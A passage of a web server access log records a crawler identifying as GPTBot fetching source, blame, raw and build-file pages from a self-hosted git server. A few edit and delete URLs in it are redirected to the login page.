GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10925] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13180] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11369] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" -[17/Feb/2026:15:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/branch/main" [Client 74.7.227.38] [Length 7477] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:15:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 74.7.227.38] [Length 11933] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:15:54:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:15:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:15:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" -[17/Feb/2026:15:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12896] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" -[17/Feb/2026:15:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" -[17/Feb/2026:15:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:15:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 14189] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:54:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11911] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" -[17/Feb/2026:15:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12553] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:15:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15797] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11893] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:15:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29831] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29833] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" -[17/Feb/2026:15:55:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:15:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:15:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 